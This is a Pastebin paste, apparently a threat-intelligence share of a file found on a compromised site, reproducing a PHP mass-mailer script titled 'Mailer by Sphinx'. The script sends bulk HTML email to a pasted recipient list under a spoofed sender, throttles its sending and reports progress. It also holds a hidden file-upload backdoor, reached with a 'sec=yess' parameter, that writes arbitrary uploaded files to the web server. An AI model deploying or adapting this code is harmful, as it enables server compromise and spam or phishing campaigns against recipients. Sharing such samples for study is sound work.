Advertisement
Neonprimetime

2018-11-06 ‪oikgmf[.]com/ABLEGOD.php‬

Nov 6th, 2018
687
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.69 KB | None | 0 0
  1. Mailer
  2.  
  3. <?php
  4. @set_time_limit(0);
  5. if(isset($_POST['Enoc']))
  6. {
  7. $message = $_POST['html'];
  8. $subject = $_POST['assunto'];
  9. $de = $_POST['de'];
  10. $nombre = $_POST['RealName'];
  11. $ellos = $_POST['ellos'];
  12.  
  13. $message = urlencode($message);
  14. $message = ereg_replace("%5C%22", "%22", $message);
  15. $message = urldecode($message);
  16. $message = stripslashes($message);
  17.  
  18. }else{
  19. $testa ="";
  20. $message = "<html><body><h1>hola my friend, How are u ?</h1></body></html>";
  21. $subject = $_SERVER["HTTP_HOST"];
  22. $nombre = "mailer";
  23. $de = "info@el-nacional.com";
  24. $ellos = "hoodsuccess2013@live.com";
  25. }
  26. ?>
  27. <html>
  28. <head>
  29. <title> Mailer by Sphinx</title></head>
  30. </head>
  31. <body style="font-family: Arial; font-size: 11px">
  32. <center>
  33. <form action="" method="post" enctype="multipart/form-data" name="form1">
  34. <br><table width="534" height="248" border="0" cellpadding="0" cellspacing="1" bgcolor="#0000CC" class="normal">
  35. <tr>
  36. <td>
  37. <table border="0" bgcolor="#FFFFFF" width="95%">
  38. <tr>
  39. <td>
  40. <table border="0" width="100%">
  41. <tr>
  42. <td width="359">Email: <input name="de" type="text" class="form" id="de" size="30" value="<? print $de; ?>"></td>
  43. <td>Nombre: <input name="RealName" type="text" class="form" id="RealName" size="30" value="<? print $nombre; ?>"></td>
  44. </tr>
  45. </table>
  46. </td>
  47. </tr>
  48. <tr>
  49. <td>Asunto: <input name="assunto" type="text" class="form" id="assunto" size="78" value="<? print $subject; ?>"></td>
  50. </tr>
  51. <tr>
  52. <td height="18" bgcolor="#C0C0C0"></td>
  53. </tr>
  54. <tr>
  55. <td>
  56. <table border="0" width="100%">
  57. <tr>
  58. <td>
  59. <textarea name="html" cols="66" rows="10" id="html"><? print $message; ?></textarea></td>
  60. <td><textarea rows="10" name="ellos" cols="35"><? print $ellos; ?></textarea></td>
  61. </tr>
  62. </table>
  63. </td>
  64. </tr>
  65. <tr>
  66. <td><center>
  67. <br><input type="submit" name="Enoc" value="Enviar"></center><br>
  68. <?php
  69. if($_GET['sec']=='yess')
  70. {
  71. echo '<form action="" method="post" enctype="multipart/form-data">
  72. <input name="archivo" type="file" size="35" />
  73. <input name="enviar" type="submit" value="Upload File" />
  74. <input name="action" type="hidden" value="upload" />
  75. </form>';
  76.  
  77. $status = "";
  78. if ($_POST["action"] == "upload")
  79. {
  80. $tamano = $_FILES["archivo"]['size'];
  81. $tipo = $_FILES["archivo"]['type'];
  82. $archivo = $_FILES["archivo"]['name'];
  83.  
  84. if ($archivo != "")
  85. {
  86. if (copy($_FILES['archivo']['tmp_name'],"./".$archivo))
  87. {
  88. $status = "Archivo subido: <b>".$archivo."</b>";
  89. }else{
  90. $status = "Error al subir el archivo";
  91. }
  92. } else {
  93. $status = "Error al subir archivo";
  94. }
  95. echo $status;
  96. }
  97. }
  98. if(!isset($_POST['Enoc'])){
  99. exit;
  100. }
  101.  
  102. if(!isset($_GET['c']))
  103. {
  104. $email = explode("\n", $ellos);
  105. }else{
  106. $email = explode(",", $ellos);
  107. }
  108. $son = count($email);
  109.  
  110. if(!isset($_GET['e'])){
  111. $header = "MIME-Version: 1.0\n";
  112. $header .= "Content-type: text/html; charset=iso-8859-1\n";
  113. $header .= "From: ".$nombre . " <" . $de . ">\n";
  114. $header .= "Reply-To: " . $de . "\n";
  115. $header .= "X-Priority: 3\n";
  116. $header .= "X-MSMail-Priority: Normal\n";
  117. $header .= "X-Mailer: ".$_SERVER["HTTP_HOST"];
  118. }else{
  119. $header ='MIME-Version: 1.0' . "\r\n";
  120. $header .= 'Content-type: text/html' . "\r\n";
  121. $header .="From: ".$de;
  122. }
  123. $i = 0;
  124. $voy=1;
  125. while($email[$i])
  126. {
  127. if(isset($_GET['time']) && isset($_GET['cant'])){
  128. if(fmod($i,$_GET['cant'])==0 && $i>0){
  129. print "----------------------------------> wait ".$_GET['time']." Segs. Sending to ".$_GET['notf']."...<br>\n";
  130. flush();
  131. @mail($_GET['notf'], $subject, $message, $header);
  132. sleep($_GET['time']);
  133. }
  134. }
  135. $mail = str_replace(array("\n","\r\n"),'',$email[$i]);
  136. $message1 = ereg_replace("&email&", $mail, $message);
  137. if(@mail($mail, $subject, $message1, $header))
  138. {
  139. print "<font color=blue face=verdana size=1> ".$voy." de ".$son." ;-) ".trim($mail)." okey dokey!</font><br>\n";
  140. flush();
  141. }
  142. else
  143. {
  144. print "<font color=red face=verdana size=1> ".$voy." de ".$son.":-( ".trim($mail)." Error te digo altoquesein!!</font><br>\n";
  145. flush();
  146. }
  147. $i++;
  148. $voy++;
  149. }
  150. echo "<script> alert('---Todos Spammed---'); </script>";
  151. ?>
  152. </td>
  153. </tr>
  154. </table>
  155. </td>
  156. </tr>
  157. </table>
  158. </body>
  159. </form>
  160. </center>
  161. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement